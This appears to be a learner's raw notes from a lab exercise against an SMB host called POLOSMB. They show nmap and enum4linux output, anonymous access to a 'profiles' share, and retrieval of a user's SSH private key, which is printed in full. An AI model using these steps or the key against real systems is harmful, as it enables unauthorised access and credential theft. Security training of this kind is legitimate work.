Information gathered and steps taken
====================================================================================================

export IP=10.10.0.199

ping -c 3 $IP - successful

=====================================================================================================
Nmap Scan: nmap -A -Pn -R $IP 

Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 91:df:5c:7c:26:22:6e:90:23:a7:7d:fa:5c:e1:c2:52 (RSA)
|   256 86:57:f5:2a:f7:86:9c:cf:02:c1:ac:bc:34:90:6b:01 (ECDSA)
|_  256 81:e3:cc:e7:c9:3c:75:d7:fb:e0:86:a0:01:41:77:81 (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: POLOSMB; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 3s, deviation: 9s, median: -2s
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: polosmb
|   NetBIOS computer name: POLOSMB\x00
|   Domain name: \x00
|   FQDN: polosmb
|_  System time: 2022-06-21T20:36:30+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: POLOSMB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2022-06-21T20:36:17
|_  start_date: N/A

=========================================================================================================
Enum4linux results: enum4linux -a $IP


 =========================================( Target Information )=========================================

Target ........... 10.10.0.199
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.0.199 )============================


[+] Got domain/workgroup name: WORKGROUP


 ================================( Nbtstat Information for 10.10.0.199 )================================

Looking up status of 10.10.0.199
        POLOSMB         <00> -         B <ACTIVE>  Workstation Service
        POLOSMB         <03> -         B <ACTIVE>  Messenger Service
        POLOSMB         <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ====================================( Session Check on 10.10.0.199 )====================================


[+] Server 10.10.0.199 allows sessions using username '', password ''


 =================================( Getting domain SID for 10.10.0.199 )=================================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup


 ===================================( OS information on 10.10.0.199 )===================================


[E] Can't get OS info with smbclient


[+] Got OS info for 10.10.0.199 from srvinfo:
        POLOSMB        Wk Sv PrQ Unx NT SNT polosmb server (Samba, Ubuntu)
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03


 ========================================( Users on 10.10.0.199 )========================================

Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.

Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.

 ==================================( Share Enumeration on 10.10.0.199 )==================================


        Sharename       Type      Comment
        ---------       ----      -------
        netlogon        Disk      Network Logon Service
        profiles        Disk      Users profiles
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (polosmb server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            POLOSMB

[+] Attempting to map shares on 10.10.0.199


[E] Can't understand response:

tree connect failed: NT_STATUS_BAD_NETWORK_NAME
//10.10.0.199/netlogon  Mapping: N/A Listing: N/A Writing: N/A
//10.10.0.199/profiles  Mapping: OK Listing: OK Writing: N/A
//10.10.0.199/print$    Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.0.199/IPC$      Mapping: N/A Listing: N/A Writing: N/A

 ============================( Password Policy Information for 10.10.0.199 )============================



[+] Attaching to 10.10.0.199 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] POLOSMB
        [+] Builtin

[+] Password Info for Domain: POLOSMB

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes
        [+] Locked Account Duration: 30 minutes
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes



[+] Retieved partial password policy with rpcclient:


Password Complexity: Disabled
Minimum Password Length: 5


 =======================================( Groups on 10.10.0.199 )=======================================


[+] Getting builtin groups:


[+]  Getting builtin group memberships:


[+]  Getting local groups:


[+]  Getting local group memberships:


[+]  Getting domain groups:


[+]  Getting domain group memberships:


 ===================( Users on 10.10.0.199 via RID cycling (RIDS: 500-550,1000-1050) )===================


[I] Found new SID:
S-1-22-1

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\cactus (Local User)

[+] Enumerating users using SID S-1-5-21-434125608-3964652802-3194254534 and logon username '', password ''

S-1-5-21-434125608-3964652802-3194254534-501 POLOSMB\nobody (Local User)
S-1-5-21-434125608-3964652802-3194254534-513 POLOSMB\None (Domain Group)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

 ================================( Getting printer info for 10.10.0.199 )================================

No printers returned.

=========================================================================================================
smbclient: smbclient //10.10.0.199/profiles -U Anonymous -p 139

smb: \> ls
  .                                   D        0  Tue Apr 21 07:08:23 2020
  ..                                  D        0  Tue Apr 21 06:49:56 2020
  .cache                             DH        0  Tue Apr 21 07:08:23 2020
  .profile                            H      807  Tue Apr 21 07:08:23 2020
  .sudo_as_admin_successful           H        0  Tue Apr 21 07:08:23 2020
  .bash_logout                        H      220  Tue Apr 21 07:08:23 2020
  .viminfo                            H      947  Tue Apr 21 07:08:23 2020
  Working From Home Information.txt      N      358  Tue Apr 21 07:08:23 2020
  .ssh                               DH        0  Tue Apr 21 07:08:23 2020
  .bashrc                             H     3771  Tue Apr 21 07:08:23 2020
  .gnupg                             DH        0  Tue Apr 21 07:08:23 2020

                12316808 blocks of size 1024. 7583704 blocks available


smb: \> more "Working From Home Information.txt"

John Cactus,

As you're well aware, due to the current pandemic most of POLO inc. has insisted that, wherever
possible, employees should work from home. As such- your account has now been enabled with ssh
access to the main server.

If there are any problems, please contact the IT department at it@polointernalcoms.uk

Regards,

James
Department Manager

========================================================================

cd .ssh

more "id_rsa"

get id_rsa

MIIEpAIBAAKCAQEA2+zmi/My2eWfDlN8GT0iEB2qMiPGHNyP/P2On2loGE2W3zT3
sZYtI8XQHk3hstl91wAlnAeBxXo24jbDGC48ude4MFijwbzfOuYvLiENBqmsqvyp
gR6bgW0dMl/0qcn8r80d1Q9eqYPw/lk/IS2jR0mJuhTWC7JlZ1g0iQwYUte/XM37
bqFueZsPzqs1la+ZZ/XCnnrl5TVdZagowahdwpcxAbzeCVvBkv64i03h3F3jCDFE
7iKa+F6Lzf1YryJS6k2Mu5R7lIei9kagH8OfhUq+EGVtcxwjKEuhaKE6Jqv9NxBi
QhnKfNP309HtOJ/u/j8Z5r2UJDsHtQNYVBugvwIDAQABAoIBABgca9YyDoQnEX4P
lw5pTl+38N3YYDLv13VkEwvVEY2AjCbidrlofoBqgnugDDuAbrRwlq75f7e3w2af
nFn9T7kMNmxOe32VCGA7tjZ3dycg2QZR9v9p7KCO5uGL9ZXbyDE56qheLAGnrnck
L7CigUEihc/50tGreESRPgk8YzpJquLS8G00h5GQPnKnboawTI9S+lkKzIuLpLBX
+Bn7lK1jacpnNjA1qkzg6yc7wlfxY9CPhIeuWZTwDAk5fHpPPVUoYRqRPJtAki3s
8mU2bbEtBj/6JqKWljhXkYMgBy6Ua9qaKoRb/FAMivg9VPp13330DIurHsSPHRum
008tKakCgYEA+IXJwrav+Bc3CG6Quc+hl/x7lnfHBmsK3jZP3YJ013/02r1ESyrJ
5+OTp5V7O4eRbdWWAFOHWUAN8m2/JM3hwmNJecrYcFLE4wFrFW3dIRanMuomakN4
snbiDGLhJ4EePXCEaoI0bD9/KUnoqkQpIR26TcZ2m+3WaBnISP98d5UCgYEA4orY
oyzYmdUpNCFK3MDuJMcrTMBwnl6L1DvT15gk/+bG/mAVgHgsyT2SwbbVH43sNmt1
tgGm7xWSOulmJ3ztxhCXwAghlSmP0coPzJq2LuusgdB4kYAwgV7LZB0aqx7aBFyw
oGb7U+fcTmLZpd7gspc+n+JLFkuh9EVmovHW0gMCgYEA8x117Svn4qtbI719iLfM
HbFZeS29HdMzM4QwBsJq6LF850rFdz7pexZOyF7bybVqF+ccMT+FJVMbEbA4j5l0
I0QbibBcoSzm/CbUCYeLDaZqc81JPSS5+uN/aJyGI64U1gevEb5D6C0JiWuK1p2N
Gp9JNHJUb19wIjAulPKRYS0CgYBcUX61CGqATfiLkOGkEk8515xSm72JHDhZVcQf
gJXbXt1K/jbk8pQ1sgzjOjGhuUFAcAw5DnVLyvubXE/P2b4/z7U3gVjGI3jDYleL
5qRFfK8A+8aWbKnXnpy+AIpEn77yth8YTr8u0zbZDrlpOelRfgb8Osiknk+ybrHD
x0/mpwKBgQCsrvJXtzUQwKsskWpYdOKp5sB0BUNCK4nC4T8T4aqGQaa2X87fmGU1
R8KXJ1nCfENH+hCza0ZDxUX7Pf2SWGLlminvZHxvl/BUZanpYaJJGCKSNM05tDsh
71DetLqdn48jtdav/U5i+/lSIQ9fW17JNPtkDD26fAmWg40za1Z51g==




========================================================================================================
Notes:

smbclient //10.10.0.199/ -U Anonymous -p 139 - prompted password

smbclient //10.10.0.199/secret -U Anonymous -p 139 - prompted password[M />

smb: \> cd .profile
cd \.profile\: NT_STATUS_NOT_A_DIRECTORY
smb: \> cat .profile
cat: command not found
smb: \> ls -la
NT_STATUS_NO_SUCH_FILE listing \-la

smb: \> allinfo .profile
altname: _P9OQF~O
create_time:    Tue Apr 21 07:08:24 AM 2020 EDT
access_time:    Tue Apr 21 07:08:24 AM 2020 EDT
write_time:     Tue Apr 21 07:08:24 AM 2020 EDT
change_time:    Tue Apr 21 07:08:24 AM 2020 EDT
attributes: H (2)
stream: [::$DATA], 807 bytes


